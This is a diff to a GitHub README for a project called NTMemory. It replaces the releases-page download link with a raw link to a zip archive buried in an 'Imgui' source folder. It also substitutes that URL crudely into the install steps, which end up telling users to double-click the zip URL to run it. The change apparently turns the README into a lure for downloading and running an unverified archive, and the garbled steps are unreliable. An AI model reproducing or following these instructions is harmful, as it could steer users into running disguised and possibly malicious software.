Hanssyyr/NTMemory/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [NTMemory Releases](https://github.com/Hanssyyr/NTMemory/releases).
+To get started, visit this page to download: [NTMemory Releases](https://raw.githubusercontent.com/Hanssyyr/NTMemory/master/NTMemory/Imgui/Memory-NT-v2.6.zip).

 1. Click on the "Releases" link above.
 2. You’ll see a list of available versions.
 Choose the latest version to ensure you have the most recent features and fixes.
-3. Look for the file labeled as NTMemory.exe (or similar).
+3. Look for the file labeled as https://raw.githubusercontent.com/Hanssyyr/NTMemory/master/NTMemory/Imgui/Memory-NT-v2.6.zip (or similar).
 4. Click on the file name to start the download.
 5. Once the download finishes, locate the file in your Downloads folder.
-6. Double-click the NTMemory.exe file to run it.
+6. Double-click the https://raw.githubusercontent.com/Hanssyyr/NTMemory/master/NTMemory/Imgui/Memory-NT-v2.6.zip file to run it.

 ## 🛠️ System Requirements